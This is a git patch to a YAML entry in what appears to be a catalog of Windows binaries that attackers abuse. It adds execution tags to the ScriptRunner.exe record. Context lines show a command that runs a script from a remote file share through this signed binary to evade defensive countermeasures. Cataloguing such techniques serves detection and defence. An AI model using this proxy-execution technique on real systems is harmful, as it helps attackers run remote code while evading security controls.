From cb302b5d137e2db17115a68214fed70c1516516c Mon Sep 17 00:00:00 2001
From: hegusung <7390383+hegusung@users.noreply.github.com>
Date: Sun, 13 Oct 2024 17:04:59 +0200
Subject: [PATCH] Update Scriptrunner.yml Tags

Added Tags:
- Execute: EXE
- Execute: CMD
- Execute: Remote
---
 yml/OSBinaries/Scriptrunner.yml | 5 +++++
 1 file changed, 5 insertions(+)

diff --git a/yml/OSBinaries/Scriptrunner.yml b/yml/OSBinaries/Scriptrunner.yml
index be2a779..4c5b141 100644
--- a/yml/OSBinaries/Scriptrunner.yml
+++ b/yml/OSBinaries/Scriptrunner.yml
@@ -11,6 +11,8 @@ Commands:
     Privileges: User
     MitreID: T1202
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
+    Tags:
+    - Execute: EXE
   - Command: ScriptRunner.exe -appvscript "\\fileserver\calc.cmd"
     Description: Executes calc.cmd from remote server
     Usecase: Execute binary through proxy binary from external server to evade defensive counter measures
@@ -18,6 +20,9 @@ Commands:
     Privileges: User
     MitreID: T1218
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
+    Tags:
+    - Execute: Remote
+    - Execute: CMD
 Full_Path:
   - Path: C:\Windows\System32\scriptrunner.exe
   - Path: C:\Windows\SysWOW64\scriptrunner.exe